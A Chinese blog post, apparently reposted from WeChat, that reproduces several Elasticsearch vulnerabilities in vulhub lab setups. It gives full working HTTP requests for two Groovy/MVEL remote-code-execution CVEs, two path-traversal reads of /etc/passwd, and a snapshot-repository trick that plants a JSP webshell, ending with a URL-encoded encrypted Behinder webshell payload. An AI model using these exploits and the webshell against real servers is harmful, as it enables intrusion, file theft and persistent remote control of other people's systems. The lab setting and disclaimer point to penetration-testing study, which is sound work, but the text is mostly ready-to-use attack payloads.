本文复现环境都是来自vulhub,复现这个原因是在攻防演练中遇到Elasticsearch相对来说还是较多的。以下复现语言简洁,从word里面复制出来的图片较模糊
1.未授权访问获取敏感信息
/_cat/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status
2.CVE-2014-3120远程代码执行
访问环境
提交数据包,创建一条数据
POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22{"name": "test"}
创建成功之后,就可以执行代码了
POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 356{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();"}}}
反弹shell需进行编码
http://www.jackson-t.ca/runtime-exec-payloads.html
3.CVE-2015-1427远程代码执行
访问环境
发送POST数据包,创建一个数据
POST /website/blog/ HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22{"name": "test"}
创建成功,然后执行代码
POST /_search?pretty HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()"}}}
进行编码,反弹shell
4.目录穿越CVE-2015-3337
访问环境
/_cat/plugins:查看所有已安装的插件
需使用burp发包访问,浏览器验证不了
GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
5.目录穿越CVE-2015-5531
访问环境
使用PUT请求,创建一个仓库
PUT /_snapshot/test HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 108{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/test"}}
使用同样方法创建一个快照
PUT /_snapshot/test2 HTTP/1.1Host: 192.168.100.180:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 126{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"}}
访问
http://192.168.100.180:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdGET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: 192.168.100.180:9200Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
需要解码,在控制台可以输入String.fromCharCode(里面就是这些数字)
6.Elasticsearch写入webshell漏洞
访问环境
写入webshell前提你得知道网站路径
首先创建一个恶意索引文档
终端执行
curl -XPOST http://192.168.100.180:9200/yz.jsp/yz.jsp/1 -d '{"<%newjava.io.RandomAccessFile(application.getRealPath(new String(newbyte[]{47,116,101,115,116,46,106,115,112})),new String(newbyte[]{114,119})).write(request.getParameter(new String(newbyte[]{102})).getBytes());%>":"test"}'
载创建一个恶意的存储库
curl -XPUT 'http://192.168.100.180:9200/_snapshot/yz.jsp' -d '{ "type":"fs", "settings": { "location":"/usr/local/tomcat/webapps/wwwroot/", "compress": false }}'
存储库验证并创建
curl -XPUT "http://192.168.100.180:9200/_snapshot/yz.jsp/yz.jsp" -d '{"indices": "yz.jsp","ignore_unavailable": "true","include_global_state": false}'
访问8080端口,验证文件是否可以访问
http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp
该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,参数为f
http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e写入webshell,需进行url编码,不然不会成功的
http://192.168.100.180:8080/wwwroot/test.jsp
可以看见已经写入进去了,使用冰蝎连接
本文始发于微信公众号(MrLee 小师父):Elasticsearch漏洞集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论